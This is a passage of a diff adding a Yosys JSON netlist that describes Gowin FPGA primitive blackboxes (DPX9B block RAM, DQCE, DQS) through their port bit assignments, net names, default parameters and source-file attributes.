80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1807.14-1807.17" + } + }, + "ADB": { + "hide_name": 0, + "bits": [ 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1807.19-1807.22" + } + }, + "BLKSEL": { + "hide_name": 0, + "bits": [ 74, 75, 76 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1806.13-1806.19" + } + }, + "CEA": { + "hide_name": 0, + "bits": [ 109 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1810.7-1810.10" + } + }, + "CEB": { + "hide_name": 0, + "bits": [ 110 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1810.12-1810.15" + } + }, + "CLKA": { + "hide_name": 0, + "bits": [ 107 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1809.7-1809.11" + } + }, + "CLKB": { + "hide_name": 0, + "bits": [ 108 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1809.13-1809.17" + } + }, + "DIA": { + "hide_name": 0, + "bits": [ 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1805.14-1805.17" + } + }, + "DIB": { + "hide_name": 0, + "bits": [ 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1805.19-1805.22" + } + }, + "DOA": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1804.15-1804.18" + } + }, + "DOB": { + "hide_name": 0, + "bits": [ 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1804.20-1804.23" + } + }, + "OCEA": { + "hide_name": 0, + "bits": [ 111 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1811.7-1811.11" + } + }, + "OCEB": { + "hide_name": 0, + "bits": [ 112 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1811.13-1811.17" + } + }, + "RESETA": { + "hide_name": 0, + "bits": [ 113 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1812.7-1812.13" + } + }, + "RESETB": { + "hide_name": 0, + "bits": [ 114 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1812.15-1812.21" + } + }, + "WREA": { + "hide_name": 0, + "bits": [ 105 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1808.7-1808.11" + } + }, + "WREB": { + "hide_name": 0, + "bits": [ 106 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1808.13-1808.17" + } + } + } + }, + "DPX9B": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1069.1-1151.10" + }, + "parameter_default_values": { + "BIT_WIDTH_0": "00000000000000000000000000010010", + "BIT_WIDTH_1": "00000000000000000000000000010010", + "BLK_SEL_0": "000", + "BLK_SEL_1": "000", + "INIT_RAM_00": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_01": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_02": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_03": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_04": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_05": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_06": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_07": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_08": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_09": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_10": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_11": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_12": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_13": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_14": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_15": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_16": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_17": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_18": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_19": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_20": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_21": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_22": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_23": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_24": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_25": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_26": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_27": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_28": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_29": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_30": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_31": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_32": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_33": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_34": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_35": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_36": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_37": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_38": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_39": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "READ_MODE0": "0", + "READ_MODE1": "0", + "RESET_MODE": "SYNC", + "WRITE_MODE0": "00", + "WRITE_MODE1": "00" + }, + "ports": { + "CLKA": { + "direction": "input", + "bits": [ 2 ] + }, + "CEA": { + "direction": "input", + "bits": [ 3 ] + }, + "CLKB": { + "direction": "input", + "bits": [ 4 ] + }, + "CEB": { + "direction": "input", + "bits": [ 5 ] + }, + "OCEA": { + "direction": "input", + "bits": [ 6 ] + }, + "OCEB": { + "direction": "input", + "bits": [ 7 ] + }, + "RESETA": { + "direction": "input", + "bits": [ 8 ] + }, + "RESETB": { + "direction": "input", + "bits": [ 9 ] + }, + "WREA": { + "direction": "input", + "bits": [ 10 ] + }, + "WREB": { + "direction": "input", + "bits": [ 11 ] + }, + "ADA": { + "direction": "input", + "bits": [ 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25 ] + }, + "ADB": { + "direction": "input", + "bits": [ 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39 ] + }, + "DIA": { + "direction": "input", + "bits": [ 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57 ] + }, + "DIB": { + "direction": "input", + "bits": [ 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75 ] + }, + "BLKSELA": { + "direction": "input", + "bits": [ 76, 77, 78 ] + }, + "BLKSELB": { + "direction": "input", + "bits": [ 79, 80, 81 ] + }, + "DOA": { + "direction": "output", + "bits": [ 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99 ] + }, + "DOB": { + "direction": "output", + "bits": [ 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117 ] + } + }, + "cells": { + }, + "netnames": { + "ADA": { + "hide_name": 0, + "bits": [ 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1147.14-1147.17" + } + }, + "ADB": { + "hide_name": 0, + "bits": [ 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1147.19-1147.22" + } + }, + "BLKSELA": { + "hide_name": 0, + "bits": [ 76, 77, 78 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1149.13-1149.20" + } + }, + "BLKSELB": { + "hide_name": 0, + "bits": [ 79, 80, 81 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1149.22-1149.29" + } + }, + "CEA": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1143.13-1143.16" + } + }, + "CEB": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1143.24-1143.27" + } + }, + "CLKA": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1143.7-1143.11" + } + }, + "CLKB": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1143.18-1143.22" + } + }, + "DIA": { + "hide_name": 0, + "bits": [ 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1148.14-1148.17" + } + }, + "DIB": { + "hide_name": 0, + "bits": [ 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1148.19-1148.22" + } + }, + "DOA": { + "hide_name": 0, + "bits": [ 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1150.15-1150.18" + } + }, + "DOB": { + "hide_name": 0, + "bits": [ 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1150.20-1150.23" + } + }, + "OCEA": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1144.7-1144.11" + } + }, + "OCEB": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1144.13-1144.17" + } + }, + "RESETA": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1145.7-1145.13" + } + }, + "RESETB": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1145.15-1145.21" + } + }, + "WREA": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1146.7-1146.11" + } + }, + "WREB": { + "hide_name": 0, + "bits": [ 11 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1146.13-1146.17" + } + } + } + }, + "DQCE": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1567.1-1571.10" + }, + "ports": { + "CLKIN": { + "direction": "input", + "bits": [ 2 ] + }, + "CE": { + "direction": "input", + "bits": [ 3 ] + }, + "CLKOUT": { + "direction": "output", + "bits": [ 4 ] + } + }, + "cells": { + }, + "netnames": { + "CE": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1569.7-1569.9" + } + }, + "CLKIN": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1568.7-1568.12" + } + }, + "CLKOUT": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1570.8-1570.14" + } + } + } + }, + "DQS": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:875.1-895.10" + }, + "parameter_default_values": { + "DQS_MODE": " ", + "FIFO_MODE_SEL": " ", + "GSREN": " ", + "HWL": " ", + "ID": " ", + "RD_PNTR": " " + }, + "ports": { + "DQSR90": { + "direction": "output", + "bits": [ 2 ] + }, + "DQSW0": { + "direction": "output", + "bits": [ 3 ] + }, + "DQSW270": { + "direction": "output", + "bits": [ 4 ] + }, + "RPOINT": { + "direction": "output", + "bits": [ 5, 6, 7 ] + }, + "WPOINT": { + "direction": "output", + "bits": [ 8, 9, 10 ] + }, + "RVALID": { + "direction": "output", + "bits": [ 11 ] + }, + "RBURST": { + "direction": "output", + "bits": [ 12 ] + }, + "RFLAG": { + "direction": "output", + "bits": [ 13 ] + }, + "WFLAG": { + "direction": "output", + "bits": [ 14 ] + }, + "DQSIN": { + "direction": "input", + "bits": [ 15 ] + }, + "DLLSTEP": { + "direction": "input", + "bits": [ 16, 17, 18, 19, 20, 21, 22, 23 ] + }, + "WSTEP": { + "direction": "input", + "bits": [ 24, 25, 26, 27, 28, 29, 30, 31 ] + }, + "READ": { + "direction": "input", + "bits": [ 32, 33, 34, 35 ] + }, + "RLOADN": { + "direction": "input", + "bits": [ 36 ] + }, + "RMOVE": { + "direction": "input", + "bits": [ 37 ] + }, + "RDIR": { + "direction": "input", + "bits": [ 38 ] + }, + "WLOADN": { + "direction": "input", + "bits": [ 39 ] + }, + "WMOVE": { + "direction": "input", + "bits": [ 40 ] + }, + "WDIR": { + "direction": "input", + "bits": [ 41 ] + }, + "HOLD": { + "direction": "input", + "bits": [ 42 ] + }, + "RCLKSEL": { + "direction": "input", + "bits": [ 43, 44, 45 ] + }, + "PCLK": { + "direction": "input", + "bits": [ 46 ] + }, + "FCLK": { + "direction": "input", + "bits": [ 47 ] + }, + "RESET": { + "direction": "input", + "bits": [ 48 ] + } + }, + "cells": { + }, + "netnames": { + "DLLSTEP": { + "hide_name": 0, + "bits": [ 16, 17, 18, 19, 20, 21, 22, 23 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:881.17-881.24" + } + }, + "DQSIN": { + "hide_name": 0, + "bits": [ 15 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:878.11-878.16" + } + }, + "DQSR90": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:885.12-885.18" + } + }, + "DQSW0": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:885.20-885.25" + } + }, + "DQSW270": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:885.27-885.34" + } + }, + "FCLK": { + "hide_name": 0, + "bits": [ 47 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:878.22-878.26" + } + }, + "HOLD": { + "hide_name": 0, + "bits": [ 42 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:883.53-883.57" + } + }, + "PCLK": { + "hide_name": 0, + "bits": [ 46 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:878.17-878.21" + } + }, + "RBURST": { + "hide_name": 0, + "bits": [ 12 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:887.19-887.25" + } + }, + "RCLKSEL": { + "hide_name": 0, + "bits": [ 43, 44, 45 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:880.17-880.24" + } + }, + "RDIR": { + "hide_name": 0, + "bits": [ 38 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:883.26-883.30" + } + }, + "READ": { + "hide_name": 0, + "bits": [ 32, 33, 34, 35 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:879.17-879.21" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 48 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:878.27-878.32" + } + }, + "RFLAG": { + "hide_name": 0, + "bits": [ 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:887.27-887.32" + } + }, + "RLOADN": { + "hide_name": 0, + "bits": [ 36 